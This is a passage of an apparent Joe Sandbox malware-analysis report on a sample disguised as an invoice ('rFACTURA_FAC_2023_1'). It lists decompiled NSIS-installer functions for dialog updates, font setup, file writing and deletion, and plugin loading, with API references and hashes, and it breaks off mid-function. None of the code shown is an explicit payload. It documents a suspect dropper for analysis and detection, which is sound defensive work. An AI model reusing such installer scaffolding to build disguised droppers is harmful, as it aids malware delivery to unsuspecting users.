Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00404B8D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B8D(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404b9b
0x00404ba8
0x00404bae
0x00404bec
0x00404bec
0x00404bfb
0x00404c02
0x00000000
0x00404c04
0x00404bb0
0x00404bbf
0x00404bc7
0x00404bca
0x00404bdc
0x00404be2
0x00404be9
0x00000000
0x00404be9
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BA8
GetMessagePos.USER32 ref: 00404BB0
ScreenToClient.USER32(?,?), ref: 00404BCA
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BDC
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C02

Strings

f, xrefs: 00404BDE

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: 1a768e81d1a3c698b7e3ef6d626f5858b2063c99cedd32227338619671f62d57
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 18015E7190021CBADB00DB95DD85FFEBBBCAF95715F10412BBA50BA1D0C7B4AA058BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdb0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdc0 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdc7 = 1;
				 *0x40cdc4 = _t15 & 0x00000001;
				 *0x40cdc5 = _t15 & 0x00000002;
				 *0x40cdc6 = _t15 & 0x00000004;
				E00406281(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdb0);
				_push(_t18);
				_push(_t33);
				E004061A6();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x0040258c
0x0040156d
0x00402a65
0x00402ac2
0x00402ace

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38

Strings

Times New Roman, xrefs: 00401E1E

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
Instruction ID: 4d28dda0b40ea0953a32cffe00044d8590db675546aa8caf17c1304664b83f42
Opcode Fuzzy Hash: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
Instruction Fuzzy Hash: 78017572954241EFE7006BB0AF8AB9A7FB4AF55301F10497EF241B71E2CA7800458F2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, "true", 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x78b6d4; // 0x674f5
					_t11 =  *0x7976dc; // 0x69700
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402de7
0x00402df5
0x00402dfb
0x00402dfb
0x00402e09
0x00402e0b
0x00402e11
0x00402e18
0x00402e1a
0x00402e1a
0x00402e30
0x00402e40
0x00402e52
0x00402e52
0x00402e5a

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
MulDiv.KERNEL32(000674F5,00000064,00069700), ref: 00402E20
wsprintfW.USER32 ref: 00402E30
SetWindowTextW.USER32(?,?), ref: 00402E40
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52

Strings

verifying installer: %d%%, xrefs: 00402E2A

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
Opcode Fuzzy Hash: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59

Uniqueness

Uniqueness Score: -1.00%

Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024ae
0x100024b0
0x100024bf
0x100024c5
0x100024d2
0x100024d4
0x100024d8
0x100024d8
0x100024e0
0x100024e6
0x100024e8
0x00000000
0x100024ef
0x00000000
0x00000000
0x100024f5
0x00000000
0x00000000
0x100024ff
0x00000000
0x00000000
0x10002506
0x1000250c
0x10002518
0x1000251e
0x10002523
0x00000000
0x00000000
0x10002545
0x00000000
0x00000000
0x1000252b
0x10002531
0x10002532
0x10002534
0x00000000
0x00000000
0x1000254d
0x1000254f
0x10002551
0x10002553
0x10002553
0x00000000
0x00000000
0x100024e8
0x10002556
0x10002556
0x1000255b
0x1000256d
0x1000256d
0x10002573
0x10002578
0x1000257d
0x10002589
0x1000258e
0x00000000
0x10002593
0x1000257f
0x10002580
0x10002594
0x10002594
0x1000257d
0x10002595
0x10002599
0x1000259c
0x100025b3

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 1000256D
GlobalFree.KERNEL32(00000000), ref: 100025A8

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004028A7(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405BA7(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D2C(_t50);
				_t26 = E00405D51(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x7a8a38;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403308(_t45);
						E004032F2(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x20));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x24)));
							E004030FA();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405D0C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405E03( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028a7
0x004028a9
0x004028b5
0x004028b8
0x004028c2
0x004028c6
0x004028c6
0x004028cc
0x004028d9
0x004028e1
0x004028e4
0x004028ea
0x004028f8
0x004028fd
0x00402901
0x00402904
0x0040290d
0x00402919
0x0040291d
0x00402920
0x00402922
0x00402925
0x00402926
0x00402927
0x0040292a
0x00402949
0x00402931
0x00402936
0x0040293e
0x00402941
0x00402946
0x00402946
0x00402950
0x00402950
0x0040295d
0x00402963
0x00402969
0x0040296a
0x0040296b
0x0040296e
0x00402975
0x00402975
0x0040297b
0x0040297b
0x00402986
0x00402987
0x0040298b
0x0040298f
0x00402995
0x00402995
0x0040299c
0x00402245
0x00402ac2
0x00402ace

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
Instruction ID: bbedb4fc7ab5ed61472c20f64d7886a30c327f5f8cbd10d414b970b30e546654
Opcode Fuzzy Hash: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
Instruction Fuzzy Hash: E021DDB1800128BBCF206FA5DE49D9E7E79EF08364F10423AF960762E0CB394D418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll");
					}
				} else {
					E00402C15("true");
					 *0x40ada8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E004061BF(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E32(_t34, _t34) >= 0) {
						_t14 = E00405E03(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsp1D68.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402592
0x00402592
0x00402592
0x00402597
0x0040259a
0x0040259d
0x004025a2
0x004025a4
0x004025c4
0x00402602
0x004025c6
0x004025c8
0x004025e2
0x004025ed
0x004025ed
0x004025a6
0x004025a8
0x004025ad
0x004025bb
0x004025be
0x00402607
0x0040260a
0x00402885
0x00402885
0x00402610
0x00402619
0x0040261b
0x0040263a
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x0040261b
0x00402ac2
0x00402ace

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll, xrefs: 004025AD, 004025D4, 004025E8, 00402634
C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 004025DB

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp$C:\Users\user\AppData\Local\Temp\nsp1D68.tmp\System.dll
API String ID: 3109718747-44410490
Opcode ID: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
Instruction ID: aeea25b17c56a12648c97371da72875efc2076f5b2bafbb971aab2720b62453c
Opcode Fuzzy Hash: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
Instruction Fuzzy Hash: B5115B72A00200BECB106FB18E8D99F7664AF95389F20843FF502F22C1DAFC49425B5E

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

